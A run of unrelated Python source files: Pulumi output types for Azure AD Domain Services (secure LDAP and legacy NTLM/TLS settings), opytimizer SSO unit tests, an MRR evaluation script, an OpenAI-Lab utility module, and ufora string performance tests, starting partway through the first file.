external_access_enabled: Optional[bool] = None,
public_certificate: Optional[str] = None):
"""
:param bool enabled: Whether to enable secure LDAP for the managed domain. Defaults to `false`.
:param str pfx_certificate: The certificate/private key to use for LDAPS, as a base64-encoded TripleDES-SHA1 encrypted PKCS#12 bundle (PFX file).
:param str pfx_certificate_password: The password to use for decrypting the PKCS#12 bundle (PFX file).
:param bool external_access_enabled: Whether to enable external access to LDAPS over the Internet. Defaults to `false`.
"""
pulumi.set(__self__, "enabled", enabled)
pulumi.set(__self__, "pfx_certificate", pfx_certificate)
pulumi.set(__self__, "pfx_certificate_password", pfx_certificate_password)
if certificate_expiry is not None:
pulumi.set(__self__, "certificate_expiry", certificate_expiry)
if certificate_thumbprint is not None:
pulumi.set(__self__, "certificate_thumbprint", certificate_thumbprint)
if external_access_enabled is not None:
pulumi.set(__self__, "external_access_enabled", external_access_enabled)
if public_certificate is not None:
pulumi.set(__self__, "public_certificate", public_certificate)
@property
@pulumi.getter
def enabled(self) -> bool:
"""
Whether to enable secure LDAP for the managed domain. Defaults to `false`.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="pfxCertificate")
def pfx_certificate(self) -> str:
"""
The certificate/private key to use for LDAPS, as a base64-encoded TripleDES-SHA1 encrypted PKCS#12 bundle (PFX file).
"""
return pulumi.get(self, "pfx_certificate")
@property
@pulumi.getter(name="pfxCertificatePassword")
def pfx_certificate_password(self) -> str:
"""
The password to use for decrypting the PKCS#12 bundle (PFX file).
"""
return pulumi.get(self, "pfx_certificate_password")
@property
@pulumi.getter(name="certificateExpiry")
def certificate_expiry(self) -> Optional[str]:
return pulumi.get(self, "certificate_expiry")
@property
@pulumi.getter(name="certificateThumbprint")
def certificate_thumbprint(self) -> Optional[str]:
return pulumi.get(self, "certificate_thumbprint")
@property
@pulumi.getter(name="externalAccessEnabled")
def external_access_enabled(self) -> Optional[bool]:
"""
Whether to enable external access to LDAPS over the Internet. Defaults to `false`.
"""
return pulumi.get(self, "external_access_enabled")
@property
@pulumi.getter(name="publicCertificate")
def public_certificate(self) -> Optional[str]:
return pulumi.get(self, "public_certificate")
@pulumi.output_type
class ServiceSecurity(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "ntlmV1Enabled":
suggest = "ntlm_v1_enabled"
elif key == "syncKerberosPasswords":
suggest = "sync_kerberos_passwords"
elif key == "syncNtlmPasswords":
suggest = "sync_ntlm_passwords"
elif key == "syncOnPremPasswords":
suggest = "sync_on_prem_passwords"
elif key == "tlsV1Enabled":
suggest = "tls_v1_enabled"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ServiceSecurity. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ServiceSecurity.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ServiceSecurity.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
ntlm_v1_enabled: Optional[bool] = None,
sync_kerberos_passwords: Optional[bool] = None,
sync_ntlm_passwords: Optional[bool] = None,
sync_on_prem_passwords: Optional[bool] = None,
tls_v1_enabled: Optional[bool] = None):
"""
:param bool ntlm_v1_enabled: Whether to enable legacy NTLM v1 support. Defaults to `false`.
:param bool sync_kerberos_passwords: Whether to synchronize Kerberos password hashes to the managed domain. Defaults to `false`.
:param bool sync_ntlm_passwords: Whether to synchronize NTLM password hashes to the managed domain. Defaults to `false`.
:param bool sync_on_prem_passwords: Whether to synchronize on-premises password hashes to the managed domain. Defaults to `false`.
:param bool tls_v1_enabled: Whether to enable legacy TLS v1 support. Defaults to `false`.
"""
if ntlm_v1_enabled is not None:
pulumi.set(__self__, "ntlm_v1_enabled", ntlm_v1_enabled)
if sync_kerberos_passwords is not None:
pulumi.set(__self__, "sync_kerberos_passwords", sync_kerberos_passwords)
if sync_ntlm_passwords is not None:
pulumi.set(__self__, "sync_ntlm_passwords", sync_ntlm_passwords)
if sync_on_prem_passwords is not None:
pulumi.set(__self__, "sync_on_prem_passwords", sync_on_prem_passwords)
if tls_v1_enabled is not None:
pulumi.set(__self__, "tls_v1_enabled", tls_v1_enabled)
@property
@pulumi.getter(name="ntlmV1Enabled")
def ntlm_v1_enabled(self) -> Optional[bool]:
"""
Whether to enable legacy NTLM v1 support. Defaults to `false`.
"""
return pulumi.get(self, "ntlm_v1_enabled")
@property
@pulumi.getter(name="syncKerberosPasswords")
def sync_kerberos_passwords(self) -> Optional[bool]:
"""
Whether to synchronize Kerberos password hashes to the managed domain. Defaults to `false`.
"""
return pulumi.get(self, "sync_kerberos_passwords")
@property
@pulumi.getter(name="syncNtlmPasswords")
def sync_ntlm_passwords(self) -> Optional[bool]:
"""
Whether to synchronize NTLM password hashes to the managed domain. Defaults to `false`.
"""
return pulumi.get(self, "sync_ntlm_passwords")
@property
@pulumi.getter(name="syncOnPremPasswords")
def sync_on_prem_passwords(self) -> Optional[bool]:
"""
Whether to synchronize on-premises password hashes to the managed domain. Defaults to `false`.
"""
return pulumi.get(self, "sync_on_prem_passwords")
@property
@pulumi.getter(name="tlsV1Enabled")
def tls_v1_enabled(self) -> Optional[bool]:
"""
Whether to enable legacy TLS v1 support. Defaults to `false`.
"""
return pulumi.get(self, "tls_v1_enabled")
@pulumi.output_type
class GetServiceNotificationResult(dict):
def __init__(__self__, *,
additional_recipients: Sequence[str],
notify_dc_admins: bool,
notify_global_admins: bool):
"""
:param Sequence[str] additional_recipients: A list of additional email addresses to notify when there are alerts in the managed domain.
:param bool notify_dc_admins: Whethermembers of the _AAD DC Administrators_ group are notified when there are alerts in the managed domain.
:param bool notify_global_admins: Whether all Global Administrators are notified when there are alerts in the managed domain.
"""
pulumi.set(__self__, "additional_recipients", additional_recipients)
pulumi.set(__self__, "notify_dc_admins", notify_dc_admins)
pulumi.set(__self__, "notify_global_admins", notify_global_admins)
@property
@pulumi.getter(name="additionalRecipients")
def additional_recipients(self) -> Sequence[str]:
"""
A list of additional email addresses to notify when there are alerts in the managed domain.
"""
return pulumi.get(self, "additional_recipients")
@property
@pulumi.getter(name="notifyDcAdmins")
def notify_dc_admins(self) -> bool:
"""
Whethermembers of the _AAD DC Administrators_ group are notified when there are alerts in the managed domain.
"""
return pulumi.get(self, "notify_dc_admins")
@property
@pulumi.getter(name="notifyGlobalAdmins")
def notify_global_admins(self) -> bool:
"""
Whether all Global Administrators are notified when there are alerts in the managed domain.
"""
return pulumi.get(self, "notify_global_admins")
@pulumi.output_type
class GetServiceReplicaSetResult(dict):
def __init__(__self__, *,
domain_controller_ip_addresses: Sequence[str],
external_access_ip_address: str,
id: str,
location: str,
service_status: str,
subnet_id: str):
"""
:param Sequence[str] domain_controller_ip_addresses: A list of subnet IP addresses for the domain controllers in the replica set, typically two.
:param str external_access_ip_address: The publicly routable IP address for the domain controllers in the replica set.
:param str id: The ID of the Domain Service.
:param str location: The Azure location in which the replica set resides.
:param str service_status: The current service status for the replica set.
:param str subnet_id: The ID of the subnet in which the replica set resides.
"""
pulumi.set(__self__, "domain_controller_ip_addresses", domain_controller_ip_addresses)
pulumi.set(__self__, "external_access_ip_address", external_access_ip_address)
pulumi.set(__self__, "id", id)
pulumi.set(__self__, "location", location)
pulumi.set(__self__, "service_status", service_status)
pulumi.set(__self__, "subnet_id", subnet_id)
@property
@pulumi.getter(name="domainControllerIpAddresses")
def domain_controller_ip_addresses(self) -> Sequence[str]:
"""
A list of subnet IP addresses for the domain controllers in the replica set, typically two.
"""
return pulumi.get(self, "domain_controller_ip_addresses")
@property
@pulumi.getter(name="externalAccessIpAddress")
def external_access_ip_address(self) -> str:
"""
The publicly routable IP address for the domain controllers in the replica set.
"""
return pulumi.get(self, "external_access_ip_address")
@property
@pulumi.getter
def id(self) -> str:
"""
The ID of the Domain Service.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> str:
"""
The Azure location in which the replica set resides.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="serviceStatus")
def service_status(self) -> str:
"""
The current service status for the replica set.
"""
return pulumi.get(self, "service_status")
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> str:
"""
The ID of the subnet in which the replica set resides.
"""
return pulumi.get(self, "subnet_id")
@pulumi.output_type
class GetServiceSecureLdapResult(dict):
def __init__(__self__, *,
certificate_expiry: str,
certificate_thumbprint: str,
enabled: bool,
external_access_enabled: bool,
public_certificate: str):
"""
:param bool enabled: Whether secure LDAP is enabled for the managed domain.
:param bool external_access_enabled: Whether external access to LDAPS over the Internet, is enabled.
"""
pulumi.set(__self__, "certificate_expiry", certificate_expiry)
pulumi.set(__self__, "certificate_thumbprint", certificate_thumbprint)
pulumi.set(__self__, "enabled", enabled)
pulumi.set(__self__, "external_access_enabled", external_access_enabled)
pulumi.set(__self__, "public_certificate", public_certificate)
@property
@pulumi.getter(name="certificateExpiry")
def certificate_expiry(self) -> str:
return pulumi.get(self, "certificate_expiry")
@property
@pulumi.getter(name="certificateThumbprint")
def certificate_thumbprint(self) -> str:
return pulumi.get(self, "certificate_thumbprint")
@property
@pulumi.getter
def enabled(self) -> bool:
"""
Whether secure LDAP is enabled for the managed domain.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="externalAccessEnabled")
def external_access_enabled(self) -> bool:
"""
Whether external access to LDAPS over the Internet, is enabled.
"""
return pulumi.get(self, "external_access_enabled")
@property
@pulumi.getter(name="publicCertificate")
def public_certificate(self) -> str:
return pulumi.get(self, "public_certificate")
@pulumi.output_type
class GetServiceSecurityResult(dict):
def __init__(__self__, *,
ntlm_v1_enabled: bool,
sync_kerberos_passwords: bool,
sync_ntlm_passwords: bool,
sync_on_prem_passwords: bool,
tls_v1_enabled: bool):
"""
:param bool ntlm_v1_enabled: Whether legacy NTLM v1 support is enabled.
:param bool sync_kerberos_passwords: Whether Kerberos password hashes are synchronized to the managed domain.
:param bool sync_ntlm_passwords: Whether NTLM password hashes are synchronized to the managed domain.
:param bool sync_on_prem_passwords: Whether on-premises password hashes are synchronized to the managed domain.
:param bool tls_v1_enabled: Whether legacy TLS v1 support is enabled.
"""
pulumi.set(__self__, "ntlm_v1_enabled", ntlm_v1_enabled)
pulumi.set(__self__, "sync_kerberos_passwords", sync_kerberos_passwords)
pulumi.set(__self__, "sync_ntlm_passwords", sync_ntlm_passwords)
pulumi.set(__self__, "sync_on_prem_passwords", sync_on_prem_passwords)
pulumi.set(__self__, "tls_v1_enabled", tls_v1_enabled)
@property
@pulumi.getter(name="ntlmV1Enabled")
def ntlm_v1_enabled(self) -> bool:
"""
Whether legacy NTLM v1 support is enabled.
"""
return pulumi.get(self, "ntlm_v1_enabled")
@property
@pulumi.getter(name="syncKerberosPasswords")
def sync_kerberos_passwords(self) -> bool:
"""
Whether Kerberos password hashes are synchronized to the managed domain.
"""
return pulumi.get(self, "sync_kerberos_passwords")
@property
@pulumi.getter(name="syncNtlmPasswords")
def sync_ntlm_passwords(self) -> bool:
"""
Whether NTLM password hashes are synchronized to the managed domain.
"""
return pulumi.get(self, "sync_ntlm_passwords")
@property
@pulumi.getter(name="syncOnPremPasswords")
def sync_on_prem_passwords(self) -> bool:
"""
Whether on-premises password hashes are synchronized to the managed domain.
"""
return pulumi.get(self, "sync_on_prem_passwords")
@property
@pulumi.getter(name="tlsV1Enabled")
def tls_v1_enabled(self) -> bool:
"""
Whether legacy TLS v1 support is enabled.
"""
return pulumi.get(self, "tls_v1_enabled")
|
tests/opytimizer/optimizers/swarm/test_sso.py
|
anukaal/opytimizer
| 528 |
61827
|
import numpy as np
from opytimizer.optimizers.swarm import sso
from opytimizer.spaces import search
def test_sso_params():
params = {
'C_w': 0.1,
'C_p': 0.4,
'C_g': 0.9
}
new_sso = sso.SSO(params=params)
assert new_sso.C_w == 0.1
assert new_sso.C_p == 0.4
assert new_sso.C_g == 0.9
def test_sso_params_setter():
new_sso = sso.SSO()
try:
new_sso.C_w = 'a'
except:
new_sso.C_w = 0.1
try:
new_sso.C_w = -1
except:
new_sso.C_w = 0.1
assert new_sso.C_w == 0.1
try:
new_sso.C_p = 'b'
except:
new_sso.C_p = 0.4
try:
new_sso.C_p = 0.05
except:
new_sso.C_p = 0.4
assert new_sso.C_p == 0.4
try:
new_sso.C_g = 'c'
except:
new_sso.C_g = 0.9
try:
new_sso.C_g = 0.35
except:
new_sso.C_g = 0.9
assert new_sso.C_g == 0.9
def test_sso_compile():
search_space = search.SearchSpace(n_agents=10, n_variables=2,
lower_bound=[0, 0], upper_bound=[10, 10])
new_sso = sso.SSO()
new_sso.compile(search_space)
try:
new_sso.local_position = 1
except:
new_sso.local_position = np.array([1])
assert new_sso.local_position == np.array([1])
def test_sso_evaluate():
def square(x):
return np.sum(x**2)
search_space = search.SearchSpace(n_agents=10, n_variables=2,
lower_bound=[0, 0], upper_bound=[10, 10])
new_sso = sso.SSO()
new_sso.compile(search_space)
new_sso.evaluate(search_space, square)
def test_sso_update():
search_space = search.SearchSpace(n_agents=10, n_variables=2,
lower_bound=[0, 0], upper_bound=[10, 10])
new_sso = sso.SSO()
new_sso.compile(search_space)
new_sso.update(search_space)
|
utils/eval_mrr.py
|
BaoLocPham/hum2song
| 108 |
61831
|
import argparse
import csv
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(__file__)))
from modules.metric import mean_reciprocal_rank
def main(csv_path):
acc = 0
num = 0
with open(csv_path, "r") as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count > 0:
hum_id = row[0].split(".")[0]
preds = []
for col in row[1:]:
preds.append(str(col))
print(hum_id, mean_reciprocal_rank(preds, str(hum_id)))
acc += mean_reciprocal_rank(preds, str(hum_id))
num += 1
line_count += 1
print(f'Processed {line_count} lines.')
return acc / num
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--csv_path", type=str, required=True, help="path to predict csv")
args = parser.parse_args()
mrr = main(args.csv_path)
print("-----------------------------")
print(f"MRR: {mrr}")
|
rl/util.py
|
AsimKhan2019/OpenAI-Lab
| 340 |
61832
|
<filename>rl/util.py
import argparse
import collections
import inspect
import json
import logging
import multiprocessing as mp
import numpy as np
import re
import sys
import zipfile
from datetime import datetime, timedelta
from os import path, listdir, environ, getpid
from textwrap import wrap
PARALLEL_PROCESS_NUM = mp.cpu_count()
TIMESTAMP_REGEX = r'(\d{4}_\d{2}_\d{2}_\d{6})'
SPEC_PATH = path.join(path.dirname(__file__), 'spec')
COMPONENT_LOCKS = json.loads(
open(path.join(SPEC_PATH, 'component_locks.json')).read())
LOCK_HEAD_REST_SIG = {
# signature list of [head, rest] in component lock
'mutex': [[0, 0], [1, 1]],
'subset': [[0, 0], [1, 0], [1, 1]],
}
# parse_args to add flag
parser = argparse.ArgumentParser(description='Set flags for functions')
parser.add_argument("-b", "--blind",
help="dont render graphics",
action="store_const",
dest="render",
const=False,
default=True)
parser.add_argument("-d", "--debug",
help="activate debug log",
action="store_const",
dest="loglevel",
const=logging.DEBUG,
default=logging.INFO)
parser.add_argument("-e", "--experiment",
help="specify experiment to run",
action="store",
type=str,
nargs='?',
dest="experiment",
default="dev_dqn")
parser.add_argument("-p", "--param_selection",
help="run parameter selection if present",
action="store_true",
dest="param_selection",
default=False)
parser.add_argument("-q", "--quiet",
help="change log to warning level",
action="store_const",
dest="loglevel",
const=logging.WARNING,
default=logging.INFO)
parser.add_argument("-t", "--times",
help="number of times session is run",
action="store",
nargs='?',
type=int,
dest="times",
default=1)
parser.add_argument("-x", "--max_episodes",
help="manually set environment max episodes",
action="store",
nargs='?',
type=int,
dest="max_epis",
default=-1)
args = parser.parse_args([]) if environ.get('CI') else parser.parse_args()
# Goddam python logger
logger = logging.getLogger(__name__)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(
logging.Formatter('[%(asctime)s] %(levelname)s: %(message)s'))
logger.setLevel(args.loglevel)
logger.addHandler(handler)
logger.propagate = False
environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # mute tf warnings on optimized setup
def check_equal(iterator):
'''check if list contains all the same elements'''
iterator = iter(iterator)
try:
first = next(iterator)
except StopIteration:
return True
return all(first == rest for rest in iterator)
def check_lock(lock_name, lock, experiment_spec):
'''
refer to rl/spec/component_locks.json
check a spec's component lock using binary signatures
e.g. head = problem (discrete)
rest = [Agent, Policy] (to be discrete too)
first check if rest all has the same signature, i.e. same set
then check pair [bin_head, bin_rest] in valid_lock_sig_list
as specified by the lock's type
'''
lock_type = lock['type']
valid_lock_sig_list = LOCK_HEAD_REST_SIG[lock_type]
lock_head = lock['head']
bin_head = (experiment_spec[lock_head] in lock[lock_head])
bin_rest_list = []
for k, v_list in lock.items():
if k in experiment_spec and k != lock_head:
bin_rest_list.append(experiment_spec[k] in v_list)
# rest must all have the same signature
rest_equal = check_equal(bin_rest_list)
if not rest_equal:
logger.warn(
'All components need to be of the same set, '
'check component lock "{}" and your spec "{}"'.format(
lock_name, experiment_spec['experiment_name']))
bin_rest = bin_rest_list[0]
lock_sig = [bin_head, bin_rest]
lock_valid = lock_sig in valid_lock_sig_list
if not lock_valid:
logger.warn(
'Component lock violated: "{}", spec: "{}"'.format(
lock_name, experiment_spec['experiment_name']))
return lock_valid
def check_component_locks(experiment_spec):
'''
check the spec components for all locks
to ensure no lock is violated
refer to rl/spec/component_locks.json
'''
for lock_name, lock in COMPONENT_LOCKS.items():
check_lock(lock_name, lock, experiment_spec)
return
# import and safeguard the PROBLEMS, EXPERIMENT_SPECS with checks
def import_guard_asset():
PROBLEMS = json.loads(open(path.join(SPEC_PATH, 'problems.json')).read())
EXPERIMENT_SPECS = {}
spec_files = [spec_json for spec_json in listdir(
SPEC_PATH) if spec_json.endswith('experiment_specs.json')]
for filename in spec_files:
specs = json.loads(open(path.join(SPEC_PATH, filename)).read())
EXPERIMENT_SPECS.update(specs)
REQUIRED_PROBLEM_KEYS = [
'GYM_ENV_NAME', 'SOLVED_MEAN_REWARD',
'MAX_EPISODES', 'REWARD_MEAN_LEN']
REQUIRED_SPEC_KEYS = [
'problem', 'Agent', 'HyperOptimizer',
'Memory', 'Optimizer', 'Policy', 'PreProcessor', 'param']
for problem_name, problem in PROBLEMS.items():
assert all(k in problem for k in REQUIRED_PROBLEM_KEYS), \
'{} needs all REQUIRED_PROBLEM_KEYS'.format(
problem_name)
for experiment_name, spec in EXPERIMENT_SPECS.items():
assert all(k in spec for k in REQUIRED_SPEC_KEYS), \
'{} needs all REQUIRED_SPEC_KEYS'.format(experiment_name)
EXPERIMENT_SPECS[experiment_name]['experiment_name'] = experiment_name
check_component_locks(spec) # check component_locks.json
if 'param_range' not in EXPERIMENT_SPECS[experiment_name]:
continue
param_range = EXPERIMENT_SPECS[experiment_name]['param_range']
for param_key, param_val in param_range.items():
if isinstance(param_val, list):
param_range[param_key] = sorted(param_val)
elif isinstance(param_val, dict):
pass
else:
assert False, \
'param_range value must be list or dict: {}.{}:{}'.format(
experiment_name, param_key, param_val)
EXPERIMENT_SPECS[experiment_name]['param_range'] = param_range
return PROBLEMS, EXPERIMENT_SPECS
PROBLEMS, EXPERIMENT_SPECS = import_guard_asset()
def log_self(subject):
max_info_len = 300
info = '{}, param: {}'.format(
subject.__class__.__name__,
to_json(subject.__dict__))
trunc_info = (
info[:max_info_len] + '...' if len(info) > max_info_len else info)
logger.debug(trunc_info)
def wrap_text(text):
return '\n'.join(wrap(text, 60))
def make_line(line='-'):
if environ.get('CI'):
return
columns = 80
line_str = line*int(columns)
return line_str
def log_delimiter(msg, line='-'):
delim_msg = '''\n{0}\n{1}\n{0}\n\n'''.format(
make_line(line), msg)
logger.info(delim_msg)
def log_trial_delimiter(trial, action):
log_delimiter('{} Trial #{}/{} on PID {}:\n{}'.format(
action, trial.trial_num, trial.num_of_trials,
getpid(), trial.trial_id), '=')
def log_session_delimiter(sess, action):
log_delimiter(
'{} Session #{}/{} of Trial #{}/{} on PID {}:\n{}'.format(
action, sess.session_num, sess.num_of_sessions,
sess.trial.trial_num, sess.trial.num_of_trials,
getpid(), sess.session_id))
def timestamp():
'''timestamp used for filename'''
timestamp_str = '{:%Y_%m_%d_%H%M%S}'.format(datetime.now())
assert re.search(TIMESTAMP_REGEX, timestamp_str)
return timestamp_str
def timestamp_elapse(s1, s2):
'''calculate the time elapsed between timestamps from s1 to s2'''
FMT = '%Y_%m_%d_%H%M%S'
delta_t = datetime.strptime(s2, FMT) - datetime.strptime(s1, FMT)
return str(delta_t)
def timestamp_elapse_to_seconds(s1):
a = datetime.strptime(s1, '%H:%M:%S')
secs = timedelta(hours=a.hour, minutes=a.minute, seconds=a.second).seconds
return secs
# own custom sorted json serializer, cuz python
def to_json(o, level=0):
INDENT = 2
SPACE = " "
NEWLINE = "\n"
ret = ""
if isinstance(o, dict):
ret += "{" + NEWLINE
comma = ""
for k in sorted(o.keys()):
v = o[k]
ret += comma
comma = ",\n"
ret += SPACE * INDENT * (level+1)
ret += '"' + str(k) + '":' + SPACE
ret += to_json(v, level + 1)
ret += NEWLINE + SPACE * INDENT * level + "}"
elif isinstance(o, str):
ret += '"' + o + '"'
elif isinstance(o, list) or isinstance(o, tuple):
ret += "[" + ",".join([to_json(e, level+1) for e in o]) + "]"
elif isinstance(o, bool):
ret += "true" if o else "false"
elif isinstance(o, int):
ret += str(o)
elif isinstance(o, float):
ret += '%.7g' % o
elif isinstance(o, np.ndarray) and np.issubdtype(o.dtype, np.integer):
ret += "[" + ','.join(map(str, o.flatten().tolist())) + "]"
elif isinstance(o, np.ndarray) and np.issubdtype(o.dtype, np.inexact):
ret += "[" + \
','.join(map(lambda x: '%.7g' % x, o.flatten().tolist())) + "]"
elif o is None:
ret += 'null'
elif hasattr(o, '__class__'):
ret += '"' + o.__class__.__name__ + '"'
else:
raise TypeError(
"Unknown type '%s' for json serialization" % str(type(o)))
return ret
# format object and its properties into printable dict
def format_obj_dict(obj, keys):
if isinstance(obj, dict):
return to_json(
{k: obj.get(k) for k in keys if obj.get(k) is not None})
else:
return to_json(
{k: getattr(obj, k, None) for k in keys
if getattr(obj, k, None) is not None})
# cast dict to have flat values (int, float, str)
def flat_cast_dict(d):
for k in d:
v = d[k]
if not isinstance(v, (int, float)):
d[k] = str(v)
return d
def flatten_dict(d, parent_key='', sep='_'):
items = []
for k, v in d.items():
new_key = parent_key + sep + k if parent_key else k
if isinstance(v, collections.MutableMapping):
items.extend(flatten_dict(v, new_key, sep=sep).items())
else:
items.append((new_key, v))
return dict(items)
def get_module(GREF, dot_path):
# get module from globals() by string dot_path
path_arr = dot_path.split('.')
# base level from globals
mod = GREF.get(path_arr.pop(0))
for deeper_path in path_arr:
mod = getattr(mod, deeper_path)
return mod
def import_package_files(globals_, locals_, __file__):
'''
Dynamically import all the public attributes of the python modules in this
file's directory (the package directory) and return a list of their names.
'''
exports = []
# globals_, locals_ = globals(), locals()
package_path = path.dirname(__file__)
package_name = path.basename(package_path)
for filename in listdir(package_path):
modulename, ext = path.splitext(filename)
if modulename[0] != '_' and ext in ('.py', '.pyw'):
subpackage = '{}.{}'.format(
package_name, modulename) # pkg relative
module = __import__(subpackage, globals_, locals_, [modulename])
modict = module.__dict__
names = (modict['__all__'] if '__all__' in modict else
[name for name in
modict if inspect.isclass(modict[name])]) # all public
exports.extend(names)
globals_.update((name, modict[name]) for name in names)
return exports
def clean_id_str(id_str):
return id_str.split('/').pop().split('.').pop(0)
def parse_trial_id(id_str):
c_id_str = clean_id_str(id_str)
if re.search(TIMESTAMP_REGEX, c_id_str):
name_time_trial = re.split(TIMESTAMP_REGEX, c_id_str)
if len(name_time_trial) == 3:
return c_id_str
else:
return None
else:
return None
def parse_experiment_id(id_str):
c_id_str = clean_id_str(id_str)
if re.search(TIMESTAMP_REGEX, c_id_str):
name_time_trial = re.split(TIMESTAMP_REGEX, c_id_str)
name_time_trial.pop()
experiment_id = ''.join(name_time_trial)
return experiment_id
else:
return None
def parse_experiment_name(id_str):
c_id_str = clean_id_str(id_str)
experiment_id = parse_experiment_id(c_id_str)
if experiment_id is None:
experiment_name = c_id_str
else:
experiment_name = re.sub(TIMESTAMP_REGEX, '', experiment_id).strip('-')
assert experiment_name in EXPERIMENT_SPECS, \
'{} not in EXPERIMENT_SPECS'.format(experiment_name)
return experiment_name
def load_data_from_trial_id(id_str):
experiment_id = parse_experiment_id(id_str)
trial_id = parse_trial_id(id_str)
data_filename = './data/{}/{}.json'.format(experiment_id, trial_id)
try:
data = json.loads(open(data_filename).read())
except (FileNotFoundError, json.JSONDecodeError):
data = None
return data
def load_data_array_from_experiment_id(id_str):
# to load all ./data files for a series of trials
experiment_id = parse_experiment_id(id_str)
data_path = './data/{}'.format(experiment_id)
trial_id_array = [
f for f in listdir(data_path)
if (path.isfile(path.join(data_path, f)) and
f.startswith(experiment_id) and
f.endswith('.json'))
]
return list(filter(None, [load_data_from_trial_id(trial_id)
for trial_id in trial_id_array]))
def save_experiment_data(data_df, trial_id):
experiment_id = parse_experiment_id(trial_id)
filedir = './data/{0}'.format(experiment_id)
filename = '{0}_analysis_data.csv'.format(experiment_id)
filepath = '{}/{}'.format(filedir, filename)
data_df.round(6).to_csv(filepath, index=False)
# zip the csv and best trial json for upload to PR
zipfile.ZipFile(filepath+'.zip', mode='w').write(
filepath, arcname=filename)
trial_filename = data_df.loc[0, 'trial_id'] + '.json'
trial_filepath = '{}/{}'.format(filedir, trial_filename)
zipfile.ZipFile(trial_filepath+'.zip', mode='w').write(
trial_filepath, arcname=trial_filename)
logger.info(
'experiment data saved to {}'.format(filepath))
def configure_hardware(RAND_SEED):
'''configure rand seed, GPU'''
from keras import backend as K
if K.backend() == 'tensorflow':
K.tf.set_random_seed(RAND_SEED)
else:
K.theano.tensor.shared_randomstreams.RandomStreams(seed=RAND_SEED)
if K.backend() != 'tensorflow':
# GPU config for tf only
return
process_num = PARALLEL_PROCESS_NUM if args.param_selection else 1
tf = K.tf
gpu_options = tf.GPUOptions(
allow_growth=True,
per_process_gpu_memory_fraction=1./float(process_num))
config = tf.ConfigProto(
gpu_options=gpu_options,
allow_soft_placement=True)
sess = tf.Session(config=config)
K.set_session(sess)
return sess
def debug_mem_usage():
import psutil
from mem_top import mem_top
pid = getpid()
logger.debug(
'MEM USAGE for PID {}, MEM_INFO: {}\n{}'.format(
pid, psutil.Process().memory_info(), mem_top()))
def del_self_attr(subject):
self_attrs = list(subject.__dict__.keys())
for attr in self_attrs:
delattr(subject, attr)
import gc
gc.collect()
# clone a keras model without file I/O
def clone_model(model, custom_objects=None):
from keras.models import model_from_config
custom_objects = custom_objects or {}
config = {
'class_name': model.__class__.__name__,
'config': model.get_config(),
}
clone = model_from_config(config, custom_objects=custom_objects)
clone.set_weights(model.get_weights())
return clone
# clone a keras optimizer without file I/O
def clone_optimizer(optimizer):
from keras.optimizers import optimizer_from_config
if isinstance(optimizer, str):
return get(optimizer)
params = dict([(k, v) for k, v in optimizer.get_config().items()])
config = {
'class_name': optimizer.__class__.__name__,
'config': params,
}
clone = optimizer_from_config(config)
return clone
|
ufora/FORA/python/PurePython/StringTestCases.py
|
ufora/ufora
| 571 |
61852
|
# Copyright 2015 Ufora Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import ufora.test.PerformanceTestReporter as PerformanceTestReporter
import sys
class StringTestCases(object):
"""Test cases for pyfora strings"""
def test_string_indexing(self):
def f():
a = "abc"
return (a[0], a[1], a[2], a[-1], a[-2])
self.equivalentEvaluationTest(f)
def test_strings_with_weird_characters(self):
x = "\xb0"
def f():
return (x,"\xb0")
self.equivalentEvaluationTest(f)
def test_large_string_indexing_perf(self):
def f(ct, passCt):
x = "asdfasdf" * (ct / 8)
res = 0
for _ in xrange(passCt):
for ix in xrange(len(x)):
res = res + len(x[ix])
return res
self.evaluateWithExecutor(f, 1000000, 1)
self.evaluateWithExecutor(f, 10000, 1)
@PerformanceTestReporter.PerfTest("pyfora.string_indexing.large_string")
def test1():
self.evaluateWithExecutor(f, 1000000, 100)
@PerformanceTestReporter.PerfTest("pyfora.string_indexing.small_string")
def test2():
self.evaluateWithExecutor(f, 10000, 10000)
test1()
test2()
def test_large_string_parsing_perf(self):
def f(ct, passCt):
x = "1,2,3,4," * ct
res = 0
for _ in xrange(passCt):
ix = 0
while ix < len(x):
res = res + int(x[ix:ix+1]) + 12341234
ix = ix + 2
return res
self.evaluateWithExecutor(f, 1000000, 1)
with PerformanceTestReporter.RecordAsPerfTest("pyfora.string_to_int"):
self.evaluateWithExecutor(f, 1000000, 10)
def test_string_slicing(self):
def f(ct, passCt,chars):
x = "asdfasdf" * (ct / 8)
res = 0
for _ in xrange(passCt):
for ix in xrange(len(x)):
res = res + len(x[ix:ix+chars])
return res
self.evaluateWithExecutor(f, 1000000, 1, 2)
self.evaluateWithExecutor(f, 10000, 1, 2)
def runTest(func, name):
PerformanceTestReporter.PerfTest(name)(func)()
runTest(lambda: self.evaluateWithExecutor(f, 1000000, 10, 2), "pyfora.string_slicing_10mm.2_char_large_string.pyfora")
runTest(lambda: self.evaluateWithExecutor(f, 1000000, 10, 200), "pyfora.string_slicing_10mm.200_char_large_string.pyfora")
runTest(lambda: self.evaluateWithExecutor(f, 10000, 1000, 2), "pyfora.string_slicing_10mm.2_char_small_string.pyfora")
runTest(lambda: self.evaluateWithExecutor(f, 10000, 1000, 200), "pyfora.string_slicing_10mm.200_char_small_string.pyfora")
sys.setcheckinterval(100000)
